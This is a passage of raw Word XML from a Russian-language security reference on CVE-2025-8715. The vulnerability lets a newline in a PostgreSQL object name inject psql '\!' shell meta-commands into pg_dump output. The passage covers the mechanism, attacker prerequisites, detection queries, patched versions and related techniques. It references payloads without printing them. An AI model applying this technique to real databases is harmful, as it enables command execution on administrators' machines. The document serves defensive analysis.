        <w:t xml:space="preserve"> — quoted-identifier допускает любые байты по spec. PG не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rejects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> newline-в-имени; это считается valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896DEC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Restore-time валидация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t>-restore-парсер trust-ит dump-script (DBA в позиции trust). Никакого WAF/sanitizer-а между.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED9A83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_dump fix CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape-логика для имён в comment-блоках. R25 показал, что fix был неполный для специфичных edge cases (Unicode, format-string, COMMENT-тексты).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D7718" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DEB5F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quoted-identifier semantics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"any.bytes.except.null"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — valid identifier. Документация §4.1.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F70A23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_dump-comment generation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: pg_dump пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name: &lt;object_name&gt;; Type: ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед каждым CREATE. Имя берётся as-is (с escape для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но не для newline в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>-комментарии до CVE-2012-0868 fix).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CB8E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psql `\!`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — meta-command, документирован в psql Reference. Не SQL-команда; обрабатывается клиентским psql-CLI, не сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E6E1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2012-0868 + CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:t>: full chain в official PG advisory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B2C2C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE6EBEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL до 17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — уязвим к R25 (CVE-2025-8715).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F53CA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии (setup)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: атакующий с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на любой схеме. На multi-tenant managed PG (RDS, Cloud SQL) — application-роль обычно имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на собственной user-schema → setup-возможен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324F243" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии (активация)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: DBA / CI-system, запускающий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql -f restore.sql</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий не контролирует эту часть; ждёт legitimate-операции backup/restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6EF0A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed-провайдеры</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: на RDS/Cloud SQL/Supabase pg_dump запускается DBA вручную или через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aws rds export-cluster-to-s3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gcloud sql export sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если export-механика провайдера использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump --format=plain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и потом psql-restore — уязвимы. Если pg_restore-binary — Payload A (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>) не работает, но Payload B/C могут.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12D0F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE78AA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Никакого легитимного use case для newline в identifier-е. PostgreSQL допускает это исторически (потому что quoted-identifier должен быть transparent для имён), но в практике application/admin-кода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>никогда не нужен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Любая запись в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class.relname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid.rolname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — индикатор атаки (или баг в migration-tool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BE9988" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Маркеры:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214DC15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_authid`/`pg_class`/`pg_namespace`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имена с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(10)</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(13)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в составе — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT rolname FROM pg_authid WHERE position(chr(10) IN rolname) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — найти все объекты с newline-в-имени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BFE34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_dump output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: если dump-script содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\copy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в начале блока (то есть после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> префикса) — индикатор payload-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63CC02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: events </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с literal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(10)</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(13)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в имени — должны бить тревогу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62964EA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B535187" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Patched в 17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (август 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B761F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимые версии</w:t>
      </w:r>
      <w:r>
        <w:t>: всё до этих minor. На production-кластерах с lag в patching — типично 14.x/15.x/16.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F4113" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: AWS RDS / Cloud SQL — патчи применяются в maintenance windows; opt-out возможен. Supabase — auto-update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90707C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Регрессия CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оригинал был в 2012; fix был частичный, R25 закрыл missing cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338252F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF73159" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 (COPY FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива RCE при наличии прямого SQL-injection. 3.12.3 — RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client-side `\!`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в psql, не через server-side COPY PROGRAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D02CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.7 (CVE-2025-1094 в libpq escape)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой класс client-side bug: 1094 — в libpq escape-функциях; 8715 — в pg_dump quoting. Оба chain-ятся через psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0E91C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.2 (`--` и CR/LF)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — server-side counterpart. 3.12.2 — про newline в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-параметре HTTP-запроса; 3.12.3 — про newline в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG object name</w:t>
      </w:r>
      <w:r>
        <w:t>, который потом сериализуется в dump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B95F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.12.3 setup может требовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через 3.13.1 — SET ROLE) или CREATE TABLE (через 3.13.2 — schema_element).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504E073" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пересекается на server-side через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без proper-quoting. 3.16 — runtime server; 3.12.3 — pg_dump-time client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47236CB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (Хронология 2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полный разбор CVE-2025-8715: timeline disclosure, exact bug, patch-окно, цепочка с CVE-2025-1094.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DEF76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто и сложно покрыть:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rules.py — server-side regex-валидатор на SQL-уровне. CVE-2025-8715 — client-side chain через pg_dump; обнаруживается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через инвентаризацию version-ов psql/libpq на DBA-машинах и audit existing object-names в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
